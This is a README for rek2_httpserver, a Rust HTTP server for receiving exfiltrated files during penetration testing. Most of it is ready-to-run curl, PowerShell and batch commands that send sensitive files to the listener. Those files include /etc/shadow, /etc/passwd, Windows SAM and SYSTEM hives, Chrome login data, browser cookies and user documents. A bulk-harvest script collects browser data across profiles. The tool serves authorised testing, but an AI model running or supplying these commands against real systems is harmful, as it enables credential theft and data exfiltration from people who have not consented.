rek2_httpserver 0.1.1

HTTP server that accepts POST data to exfiltrate files from remote servers to the local machine during hacking and penetration testing

rek2_httpserver

rek2_httpserver is a robust HTTP server written in Rust, designed for reliable file exfiltration during penetration testing and hacking engagements. The server handles file uploads of any type, up to a configurable size limit, while preserving filenames and data integrity.

Features

  • Configurable Interface and Port: Specify the network interface and port via command-line arguments
  • Organized File Storage: Files are automatically organized by timestamp and client IP
  • Multiple Filename Sources: Extracts filenames from URL path, X-Filename header, or Content-Disposition
  • Large File Support: Configurable size limits (default 500MB) with streaming support
  • Path Preservation: Maintains directory structure from uploaded files
  • Robust Error Handling: Graceful handling of edge cases and malformed requests
  • Detailed Logging: Shows file sizes, client IPs, and full save paths
  • Usage Examples: a GET request to / returns curl usage examples

Usage

Command-Line Arguments

  • -i, --interface <INTERFACE>: Sets the interface IP address. Default is 0.0.0.0 (all available interfaces)
  • -p, --port <PORT>: Sets the port number. Default is 8081
  • -o, --output <OUTPUT>: Sets the output directory for uploads. Default is ./uploads
  • -s, --max-size <MAX_SIZE>: Maximum file size in MB. Default is 500
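
Putting the flags together, a non-default invocation might look like this (the IP, port, and directory names are illustrative, not defaults):

```shell
# Listen only on 192.168.1.50:9000, save uploads under ./loot, allow files up to 1024MB
./rek2_httpserver -i 192.168.1.50 -p 9000 -o ./loot -s 1024
```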

Running the Server

To start the server on a specific interface and port:

./rek2_httpserver -i 127.0.0.1 -p 8081

This will start the server on http://127.0.0.1:8081.

Exfiltrating Files

The server supports multiple methods for specifying filenames:

Method 1: Filename in URL Path (Recommended)

# Linux - preserves directory structure
curl -X POST --data-binary @/etc/passwd http://127.0.0.1:8081/upload/etc/passwd

# Windows
curl -X POST --data-binary "@C:\Windows\System32\config\SAM" http://127.0.0.1:8081/upload/Windows/System32/config/SAM

Method 2: X-Filename Header

# Linux
curl -X POST --data-binary @sensitive.db -H "X-Filename: database.db" http://127.0.0.1:8081/upload/

# Windows
curl -X POST --data-binary "@C:\Users\Admin\secrets.txt" -H "X-Filename: admin_secrets.txt" http://127.0.0.1:8081/upload/

Method 3: Content-Disposition Header

# Linux
curl -X POST --data-binary @large_file.sql -H "Content-Disposition: attachment; filename=backup.sql" http://127.0.0.1:8081/upload/

# Windows
curl -X POST --data-binary "@C:\Database\prod.db" -H "Content-Disposition: attachment; filename=production.db" http://127.0.0.1:8081/upload/

Method 4: Auto-generated Filename

# When no filename is provided, generates timestamp-based name
curl -X POST --data-binary @confidential.zip http://127.0.0.1:8081/upload/

File Organization

  • Files are saved to: uploads/YYYY-MM-DD_HH-MM-SS/client_ip/filename
  • The uploads directory is automatically created if it doesn't exist
  • Directory structure from the client is preserved when possible
  • Each upload session gets its own timestamp directory
  • No file overwrites - each upload is uniquely stored
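
The save path above can be assembled from its parts as follows (a minimal illustration; the timestamp and client IP are taken from the logging example in this README, not produced by the server):

```shell
# Reconstruct the save path the server uses: uploads/YYYY-MM-DD_HH-MM-SS/client_ip/filename
output_dir="uploads"
stamp="2024-01-15_14-30-45"     # YYYY-MM-DD_HH-MM-SS
client_ip="192.168.1.100"
filename="etc/passwd"
echo "${output_dir}/${stamp}/${client_ip}/${filename}"
```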

Server Output

The server provides detailed logging:

Server running on http://0.0.0.0:8081
Output directory: ./uploads
Max file size: 500MB
[2024-01-15_14:30:45] 192.168.1.100 - 'etc/passwd' saved (2837 bytes) -> uploads/2024-01-15_14-30-45/192.168.1.100/etc/passwd

Common Exfiltration Examples

Linux Examples

Single File Upload

# Basic file upload (filename will be auto-generated)
curl -X POST --data-binary @/etc/passwd http://target:8081/upload/

# Upload with filename in URL (recommended - preserves path)
curl -X POST --data-binary @/etc/passwd http://target:8081/upload/etc/passwd

# Upload with custom filename
curl -X POST --data-binary @/etc/shadow -H "X-Filename: shadow_backup" http://target:8081/upload/

# Upload sensitive database
curl -X POST --data-binary @/var/lib/mysql/users.db http://target:8081/upload/mysql/users.db

Multiple Files

# Upload all config files from a directory
for file in /etc/*.conf; do
    curl -X POST --data-binary @"$file" http://target:8081/upload/etc/$(basename "$file")
done

# Create a tar archive and upload
tar czf - /etc/apache2/ | curl -X POST --data-binary @- -H "X-Filename: apache_config.tar.gz" http://target:8081/upload/

# Upload all log files
find /var/log -name "*.log" -type f -exec curl -X POST --data-binary @{} http://target:8081/upload/{} \;

Windows Examples

PowerShell

# Basic file upload
Invoke-WebRequest -Uri "http://target:8081/upload/" -Method POST -InFile "C:\Windows\System32\config\SAM"

# Upload with filename in URL
$file = "C:\Users\Admin\Documents\passwords.xlsx"
$filename = Split-Path $file -Leaf
Invoke-WebRequest -Uri "http://target:8081/upload/$filename" -Method POST -InFile $file

# Upload with custom headers
$headers = @{ "X-Filename" = "windows_sam_backup" }
Invoke-WebRequest -Uri "http://target:8081/upload/" -Method POST -InFile "C:\Windows\System32\config\SAM" -Headers $headers

# Upload multiple files
Get-ChildItem -Path "C:\Users\*\Desktop\*.txt" -Recurse | ForEach-Object {
    $relativePath = $_.FullName.Replace("C:\", "").Replace("\", "/")
    Invoke-WebRequest -Uri "http://target:8081/upload/$relativePath" -Method POST -InFile $_.FullName
}

Command Prompt (curl)

:: Basic upload
curl -X POST --data-binary "@C:\Windows\System32\drivers\etc\hosts" http://target:8081/upload/

:: Upload with filename in URL
curl -X POST --data-binary "@C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" http://target:8081/upload/chrome/login_data.db

:: Upload registry hive
curl -X POST --data-binary "@C:\Windows\System32\config\SYSTEM" -H "X-Filename: SYSTEM_HIVE" http://target:8081/upload/

:: Upload with Content-Disposition
curl -X POST --data-binary "@C:\ProgramData\TeamViewer\TeamViewer.ini" -H "Content-Disposition: attachment; filename=teamviewer_config.ini" http://target:8081/upload/

Batch Script for Multiple Files

@echo off
setlocal enabledelayedexpansion

set SERVER=http://target:8081/upload/

:: Upload all PDF files from Documents
for /r "C:\Users\%USERNAME%\Documents" %%f in (*.pdf) do (
    echo Uploading: %%f
    curl -X POST --data-binary "@%%f" %SERVER%documents/%%~nxf
)

:: Upload Chromium-based browser data (default profile paths;
:: Firefox keeps its profile under AppData\Roaming\Mozilla and is not covered here)
for %%b in ("Google\Chrome" "Microsoft\Edge") do (
    if exist "C:\Users\%USERNAME%\AppData\Local\%%~b\User Data\Default" (
        echo Uploading %%~nb data...
        curl -X POST --data-binary "@C:\Users\%USERNAME%\AppData\Local\%%~b\User Data\Default\History" %SERVER%browser/%%~nb_history
        curl -X POST --data-binary "@C:\Users\%USERNAME%\AppData\Local\%%~b\User Data\Default\Cookies" %SERVER%browser/%%~nb_cookies
    )
)

Special Cases

Large Files

# Linux - Split large files before upload
split -b 100M large_backup.sql part_
for file in part_*; do
    curl -X POST --data-binary @"$file" http://target:8081/upload/backup/$file
done
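
On the receiving side, `split`'s lexical part names (`part_aa`, `part_ab`, ...) mean a plain glob reassembles the chunks in the original order. A self-contained sketch with throwaway files standing in for real uploads:

```shell
# split names parts in lexical order, so a glob restores the original byte order
workdir="$(mktemp -d)"
cd "$workdir"
printf 'first-'  > part_aa      # stand-ins for uploaded chunks
printf 'second'  > part_ab
cat part_* > rejoined.sql       # glob expands lexically: part_aa, part_ab, ...
cat rejoined.sql                # -> first-second
```

Against a real capture, the same one-liner is `cat part_* > large_backup.sql` run inside the timestamp/IP directory where the chunks landed.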

# Windows PowerShell - Upload in chunks
$file = "C:\LargeDatabase.bak"
$chunkSize = 100MB
$stream = [System.IO.File]::OpenRead($file)
$buffer = New-Object byte[] $chunkSize
$chunkNum = 0

while (($bytesRead = $stream.Read($buffer, 0, $chunkSize)) -gt 0) {
    $tempFile = [System.IO.Path]::GetTempFileName()
    [System.IO.File]::WriteAllBytes($tempFile, $buffer[0..($bytesRead-1)])
    Invoke-WebRequest -Uri "http://target:8081/upload/database_chunk_$chunkNum" -Method POST -InFile $tempFile
    Remove-Item $tempFile
    $chunkNum++
}
$stream.Close()

Compressed Upload

# Linux - Compress before sending
gzip -c /var/log/syslog | curl -X POST --data-binary @- -H "X-Filename: syslog.gz" http://target:8081/upload/

# Windows - ZIP and upload
Compress-Archive -Path "C:\SensitiveData\*" -DestinationPath "$env:TEMP\data.zip"
Invoke-WebRequest -Uri "http://target:8081/upload/sensitive_data.zip" -Method POST -InFile "$env:TEMP\data.zip"
Remove-Item "$env:TEMP\data.zip"
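
After pulling down a compressed upload, its integrity can be checked before unpacking. A sketch with a throwaway file standing in for a received syslog.gz:

```shell
workdir="$(mktemp -d)"
cd "$workdir"
echo "Jan 15 14:30:45 host sshd[1234]: session opened" > syslog   # stand-in log
gzip syslog                     # produces syslog.gz, removes the original
gzip -t syslog.gz && echo "archive OK"   # -t tests integrity without extracting
gunzip -c syslog.gz             # decompress to stdout, keeping the .gz intact
```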

Building the Project

To build the project, use:

cargo build --release

This will create an executable in the `target/release` directory.

Testing

The project includes comprehensive unit and integration tests:

# Run all tests
cargo test

# Run only unit tests
cargo test --lib

# Run only integration tests
cargo test --test upload_tests

Test Coverage:

  • 17 unit tests covering filename extraction, header parsing, and edge cases
  • 10 integration tests covering end-to-end upload functionality
  • Tests for binary file integrity, unicode filenames, and error handling

For detailed testing information, see TEST.md.

License

This project is licensed under the GPLv3 License - see the LICENSE file for details.